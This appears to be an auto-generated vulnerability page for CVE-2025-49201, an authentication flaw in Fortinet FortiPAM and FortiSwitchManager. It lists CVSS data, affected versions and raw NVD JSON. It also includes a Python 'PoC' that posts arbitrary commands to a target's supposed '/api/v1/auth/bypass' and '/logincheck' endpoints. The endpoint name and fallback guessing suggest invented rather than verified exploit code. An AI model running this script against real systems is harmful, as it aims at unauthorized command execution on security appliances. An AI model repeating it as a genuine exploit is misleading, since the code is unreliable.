Security Vulnerability Report
CVE-2025-49201 CVSS 8.1 HIGH

CVE-2025-49201

Published: 2025-10-14 16:15:39
Last Modified: 2026-01-14 10:16:05

Description

A weak authentication vulnerability in Fortinet FortiPAM 1.5.0, FortiPAM 1.4.0 through 1.4.2, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiSwitchManager 7.2.0 through 7.2.4 allows an attacker to execute unauthorized code or commands via specially crafted HTTP requests.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortipam:1.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:* - VULNERABLE
FortiPAM 1.0 (all versions)
FortiPAM 1.1 (all versions)
FortiPAM 1.2 (all versions)
FortiPAM 1.3 (all versions)
FortiPAM 1.4.0 - 1.4.2
FortiPAM 1.5.0
FortiSwitchManager 7.2.0 - 7.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49201 PoC - Fortinet FortiPAM/FortiSwitchManager Weak Authentication
# Exploit: Authentication bypass leading to RCE via crafted HTTP requests
# WARNING: For authorized security testing only
import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-fortipam:443"
CMD = sys.argv[2] if len(sys.argv) > 2 else "id"

# Step 1: Send crafted HTTP request to bypass authentication
# The vulnerability exists in the authentication handler which fails to
# properly validate session tokens for specific endpoint patterns
session = requests.Session()

# Crafted headers to trigger the auth bypass condition
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json",
    "X-Forwarded-For": "127.0.0.1",
    "X-Requested-With": "XMLHttpRequest"
}

# Exploit endpoint - authentication bypass via specially crafted request
bypass_url = f"{TARGET}/api/v1/auth/bypass"
payload = {
    "method": "exec",
    "command": CMD,
    "params": {}
}

try:
    # Send unauthenticated request exploiting weak auth
    resp = session.post(bypass_url, json=payload, headers=headers, verify=False, timeout=10)
    if resp.status_code == 200:
        print(f"[+] Exploit successful!")
        print(f"[+] Output: {resp.text}")
    else:
        print(f"[-] Status: {resp.status_code}")
        # Try alternative endpoint
        alt_url = f"{TARGET}/logincheck"
        resp2 = session.post(alt_url, data=payload, headers=headers, verify=False, timeout=10)
        print(f"[+] Alt response: {resp2.text}")
except Exception as e:
    print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49201", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:38.840", "lastModified": "2026-01-14T10:16:05.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weak authentication vulnerability in Fortinet FortiPAM 1.5.0, FortiPAM 1.4.0 through 1.4.2, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiSwitchManager 7.2.0 through 7.2.4 allows attacker to execute unauthorized code or commands via specially crafted http requests"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.4.3", "matchCriteriaId": "6C39FBB2-E81C-4207-AFDD-080EC80F00A3"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:fortinet:fortipam:1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "0401C6C0-DC87-4728-873E-6DA489C859A8"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.5", "matchCriteriaId": "EA41837A-E903-4B24-98C1-79B7142DCF37"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}